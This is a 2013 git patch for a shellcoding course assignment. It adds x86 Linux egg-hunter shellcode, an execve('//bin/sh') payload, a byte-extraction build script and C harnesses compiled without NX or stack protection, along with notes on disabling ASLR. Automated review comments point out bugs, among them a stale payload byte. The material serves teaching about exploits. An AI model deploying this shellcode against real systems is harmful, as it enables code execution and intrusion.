From 85d99f6ce8fd9a1572b924645c778900d4e362f9 Mon Sep 17 00:00:00 2001 
From: arno01 Date: Thu, 28 Mar 2013 13:20:50 +0100 Subject: [PATCH] Assignment 3 - major update --- exam3/access-noloop/NOTES | 11 +++ exam3/access-noloop/USAGE | 27 +++++ exam3/access-noloop/hunter.nasm | 87 ++++++++++++++++ exam3/access-noloop/make.sh | 132 +++++++++++++++++++++++++ exam3/access-noloop/payload.nasm | 44 +++++++++ exam3/access-noloop/shellcode.c | 20 ++++ exam3/access-scasd-noloop/NOTES | 11 +++ exam3/access-scasd-noloop/USAGE | 27 +++++ exam3/access-scasd-noloop/hunter.nasm | 92 +++++++++++++++++ exam3/access-scasd-noloop/make.sh | 132 +++++++++++++++++++++++++ exam3/access-scasd-noloop/payload.nasm | 44 +++++++++ exam3/access-scasd-noloop/shellcode.c | 20 ++++ exam3/access-scasd/NOTES | 11 +++ exam3/access-scasd/USAGE | 27 +++++ exam3/access-scasd/hunter.nasm | 61 ++++++++++++ exam3/access-scasd/make.sh | 130 ++++++++++++++++++++++++ exam3/access-scasd/payload.nasm | 44 +++++++++ exam3/access-scasd/shellcode.c | 18 ++++ exam3/access/NOTES | 11 +++ exam3/access/USAGE | 27 +++++ exam3/access/hunter.nasm | 59 +++++++++++ exam3/access/make.sh | 130 ++++++++++++++++++++++++ exam3/access/payload.nasm | 44 +++++++++ exam3/access/shellcode.c | 18 ++++ exam3/basic/NOTES | 11 +++ exam3/basic/USAGE | 27 +++++ exam3/basic/hunter.nasm | 40 ++++++++ exam3/basic/make.sh | 130 ++++++++++++++++++++++++ exam3/basic/payload.nasm | 44 +++++++++ exam3/basic/shellcode | Bin 0 -> 5100 bytes exam3/basic/shellcode.c | 18 ++++ 31 files changed, 1497 insertions(+) create mode 100644 exam3/access-noloop/NOTES create mode 100644 exam3/access-noloop/USAGE create mode 100644 exam3/access-noloop/hunter.nasm create mode 100755 exam3/access-noloop/make.sh create mode 100644 exam3/access-noloop/payload.nasm create mode 100644 exam3/access-noloop/shellcode.c create mode 100644 exam3/access-scasd-noloop/NOTES create mode 100644 exam3/access-scasd-noloop/USAGE create mode 100644 exam3/access-scasd-noloop/hunter.nasm create mode 100755 exam3/access-scasd-noloop/make.sh create mode 
100644 exam3/access-scasd-noloop/payload.nasm create mode 100644 exam3/access-scasd-noloop/shellcode.c create mode 100644 exam3/access-scasd/NOTES create mode 100644 exam3/access-scasd/USAGE create mode 100644 exam3/access-scasd/hunter.nasm create mode 100755 exam3/access-scasd/make.sh create mode 100644 exam3/access-scasd/payload.nasm create mode 100644 exam3/access-scasd/shellcode.c create mode 100644 exam3/access/NOTES create mode 100644 exam3/access/USAGE create mode 100644 exam3/access/hunter.nasm create mode 100755 exam3/access/make.sh create mode 100644 exam3/access/payload.nasm create mode 100644 exam3/access/shellcode.c create mode 100644 exam3/basic/NOTES create mode 100644 exam3/basic/USAGE create mode 100644 exam3/basic/hunter.nasm create mode 100755 exam3/basic/make.sh create mode 100644 exam3/basic/payload.nasm create mode 100755 exam3/basic/shellcode create mode 100644 exam3/basic/shellcode.c diff --git a/exam3/access-noloop/NOTES b/exam3/access-noloop/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access-noloop/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access-noloop/USAGE b/exam3/access-noloop/USAGE new file mode 100644 index 0000000..a27d412 --- /dev/null +++ b/exam3/access-noloop/USAGE 
@@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-noloop$ ./make.sh "HereItIs" + [I] Using custom EGG mark: HereItIs + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode + [+] All done! + +3. Run the shellcode + +access-noloop$ ./shellcode +Hunter Length: 66 +Payload Length: 36 +sh-4.1$ + diff --git a/exam3/access-noloop/hunter.nasm b/exam3/access-noloop/hunter.nasm new file mode 100644 index 0000000..712a8e3 --- /dev/null +++ b/exam3/access-noloop/hunter.nasm 
@@ -0,0 +1,87 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access +noloop modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; function Prologue + push ebp + mov ebp, esp + + ; preserve registers and flags + pushad + pushfd + + + ; Used for cmp edx, esi below + push 0xfffefff + pop esi + inc esi + + xor edx, edx ; Searching the whole memory + + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: +; cmp edx, 0xffff000 + cmp edx, esi ; We don't want NULL bytes + jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg) + + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x8] ; next address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. 
See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + cmp dword [edx], egg1 + jne nextAddr + cmp dword [edx+0x4], egg2 + jne nextAddr + + lea ecx, [edx+0x8] + jmp ecx + +Return: + ; restore registers and stack + popfd + popad + + ; function Epilogue + mov esp, ebp + pop ebp + + ret diff --git a/exam3/access-noloop/make.sh b/exam3/access-noloop/make.sh new file mode 100755 index 0000000..a305e35 --- /dev/null +++ b/exam3/access-noloop/make.sh 
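Review bot: The retirement check `cmp edx, esi` / `jz Return` at nextPage only fires when EDX lands exactly on 0x0ffff000, i.e. when the access() probe of that particular page failed; if that page happens to be mapped, the in-page scan carries EDX past the sentinel, EDX only grows from there, and the scan runs on to 0xffffffff where `inc edx` wraps to 0 and the loop this variant exists to prevent starts over. If ESI is meant as a scan ceiling, `jae Return` (opcode 0x73, still NULL-free) makes the bound hold regardless of which pages are mapped; otherwise the assumption that the sentinel page is unmapped should be stated in a comment. The comment `; We don't want NULL bytes` on the cmp line explains why ESI was built with push/pop/inc, not what the compare does, and the commented-out `; cmp edx, 0xffff000` above it should be removed. The found path `jmp ecx` never undoes the pushad/pushfd/EBP frame, so `; preserve registers and flags` should say that only the Return path restores them. The same sentinel check appears in exam3/access-scasd-noloop/hunter.nasm.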
@@ -0,0 +1,132 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." 
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} +EOF + +echo " [+] Compiling shellcode.c ..." 
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-noloop/payload.nasm b/exam3/access-noloop/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-noloop/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-noloop/shellcode.c b/exam3/access-noloop/shellcode.c new file mode 100644 index 0000000..d205ccf --- /dev/null +++ b/exam3/access-noloop/shellcode.c 
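Review bot: The script declares `#!/usr/bin/env sh` but relies on bash-only features — `[[ ... ]]`, the `DEFAULTEGG=( ... )` arrays with `${NEWEGG[0]}` indexing, and the `== *00*` glob match — so under a POSIX sh such as dash it dies at the first `[[` instead of doing anything useful; the first line should be `#!/usr/bin/env bash`. The length test that runs `expr length $ARG1` unquoted against both -ge 8 and -le 8 is a roundabout equality check that breaks on an argument containing whitespace; `elif [ "${#ARG1}" -ne 8 ]; then` states it safely. None of the nasm, ld or gcc invocations have their exit status checked, so a failed assembly silently proceeds to objdump of a missing binary and an empty HUNTERCODE; `set -e` after the shebang, or `|| exit 1` on each tool call, stops at the real error. The same script is duplicated verbatim in exam3/access-scasd-noloop/make.sh and exam3/access-scasd/make.sh.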
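Review bot: The header comment `; Filename: payload-execve-stack.nasm` does not match the file's actual name, payload.nasm, which is what make.sh assembles; it should read `; Filename: payload.nasm` so the header stays truthful. For consistency with the hunter's `; 0x21 = 33 = __NR_access` style, the syscall number comment would be clearer as `mov al, 11 ; 11 = __NR_execve`. The identical header is in exam3/access-scasd-noloop/payload.nasm and exam3/access-scasd/payload.nasm.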
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd-noloop/NOTES b/exam3/access-scasd-noloop/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd-noloop/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd-noloop/USAGE b/exam3/access-scasd-noloop/USAGE
new file mode 100644
index 0000000..87206e1
--- /dev/null
+++ b/exam3/access-scasd-noloop/USAGE
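Review bot: `printf("Hunter Length: %d\n", strlen(hunter))` passes a size_t to a %d conversion, which is undefined behaviour even where it happens to print the right number under -m32; use `printf("Hunter Length: %zu\n", strlen((const char *)hunter));` and the same for the payload line (the cast also removes the pointer-sign warning from passing unsigned char * to strlen). `main()` with no return type relies on implicit int, which C99 removed; declare it `int main(void)`. Because this file is produced by the heredoc in make.sh, the fix belongs in that template too, otherwise the next `./make.sh` run reverts it. Separately, the committed payload[] here begins with \x12 while hunter[] compares against \x48 ('H'), which is not what the make.sh pipeline would emit for the HereItIs egg shown in USAGE; this checked-in copy looks stale or hand-edited and should be regenerated. The same %d and implicit-int issues are in exam3/access-scasd-noloop/shellcode.c and exam3/access-scasd/shellcode.c.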
@@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-scasd-noloop$ ./make.sh "HereItIs" + [I] Using custom EGG mark: HereItIs + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode + [+] All done! + + +3. Run the shellcode + +access-scasd-noloop$ ./shellcode +Hunter Length: 68 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access-scasd-noloop/hunter.nasm b/exam3/access-scasd-noloop/hunter.nasm new file mode 100644 index 0000000..3774230 --- /dev/null +++ b/exam3/access-scasd-noloop/hunter.nasm 
@@ -0,0 +1,92 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access-scasd +noloop modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; function Prologue + push ebp + mov ebp, esp + + ; preserve registers and flags + pushad + pushfd + + + ; Used for cmp edx, esi below + push 0xfffefff + pop esi + inc esi + + + cld ; clear direction flag (DF) to use scasd properly + xor edx, edx ; Searching the whole memory + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: +; cmp edx, 0xffff000 + cmp edx, esi ; We don't want NULL bytes + jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg) + + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x4] ; address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. 
See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + mov eax, egg1 + mov edi, edx + scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4 + jnz nextAddr + + mov eax, egg2 + lea edi, [edx+4] ; address to check + scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4 + jnz nextAddr + jmp edi + +Return: + ; restore registers and stack + popfd + popad + + ; function Epilogue + mov esp, ebp + pop ebp + + ret + diff --git a/exam3/access-scasd-noloop/make.sh b/exam3/access-scasd-noloop/make.sh new file mode 100755 index 0000000..a305e35 --- /dev/null +++ b/exam3/access-scasd-noloop/make.sh 
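Review bot: The comments on both `scasd` lines misdescribe the instruction: scasd compares EAX with the dword at [EDI], not with EDI itself, and with DF cleared by the `cld` it then advances EDI by 4, so after the second scasd EDI is edx+8 rather than the edx+0x4 the comment states — and that edx+8 is exactly what `jmp edi` relies on to land just past the marker. A comment such as `; compare EAX with dword [EDI]; ZF set on match, EDI += 4` on each scasd line would make the jump target obvious to the next reader. The same two comments appear in exam3/access-scasd/hunter.nasm.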
@@ -0,0 +1,132 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." 
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} +EOF + +echo " [+] Compiling shellcode.c ..." 
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-scasd-noloop/payload.nasm b/exam3/access-scasd-noloop/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-scasd-noloop/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-scasd-noloop/shellcode.c b/exam3/access-scasd-noloop/shellcode.c new file mode 100644 index 0000000..343e1fd --- /dev/null +++ b/exam3/access-scasd-noloop/shellcode.c 
@@ -0,0 +1,20 @@
+#include
+#include
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+
+ printf("NO LOOP!\n");
+}
diff --git a/exam3/access-scasd/NOTES b/exam3/access-scasd/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access-scasd/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access-scasd/USAGE b/exam3/access-scasd/USAGE
new file mode 100644
index 0000000..83fad02
--- /dev/null
+++ b/exam3/access-scasd/USAGE
